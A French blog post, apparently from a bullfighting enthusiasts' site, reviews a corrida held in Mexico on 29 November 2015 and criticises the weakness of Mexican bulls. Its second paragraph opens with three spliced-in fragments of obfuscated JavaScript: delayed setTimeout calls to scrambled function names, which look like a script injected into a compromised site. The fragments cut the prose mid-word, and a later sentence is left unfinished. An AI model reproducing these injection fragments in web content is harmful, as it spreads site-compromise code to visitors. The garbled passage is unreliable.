UNIQUEMENT POUR AFICIONADOS

Mexico : corrida du 29 novembre 2015. Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les toros, correctement présentés, sont nobles mais n’ont pas suffisamment de charge, l’observation de la technique tauromachique s’impose à celle de l’éclat du toreo. Alors, l’aficionado s’intéresse à la corrida pendant que le spectateur s’ennuie : il ne perçoit ni l’évidence du danger, ni l’art apparaît.

La corrida de Barralva –de souche Saltillo- qui fut correcte sans plus à la pique, présenta un seul toro acceptable, le premier, dont ne profita pas Pizarro, qui s’adapta de façon intermittente aux charges franches du toro. Devant son second, très terne, il se résigna. Le reste de la corrida étala un comportement insuffisant, peut-être par son manque de vigueur ou son manque de race. L’aficionado a pu être satisfait par la maestria de Urdiales, qui parfois réussit à prolonger les charges de son premier et s’imposa avec une fière domination à son second, mais cela ne fut pas suffisant pour que le spectateur s’émeuve. Uniquement El Payo a cassé les schémas du bétail. Il a imprégné sa tauromachie de l’émotion que n’avaient pas ses toros. Même les deux spectaculaires culbutes qu’il a souffert ce n’est pas ses adversaires qui les ont provoquées mais par son excessif, et peut-être abusif engagement. Quoi qu’il en soit il arracha une oreille à chacun de ses toros. Il émut les spectateurs et gagna le respect des aficionados. Sauva t-il la course ? Probablement.

Le problème de la corrida au Mexique c’est le taureau, toujours nobles, mais aux forces très limitées et sans race. Voila la raison pour laquelle si peu de public va aux arènes. Il faut être un virtuose de la tauromachie pour que la lidia fonctionne. Je ne sais pas si l’aficionado impénitent, accro au rite taurin dominical, ou le spectateur lambda qui reste à la maison.

Les commentaires sont fermés.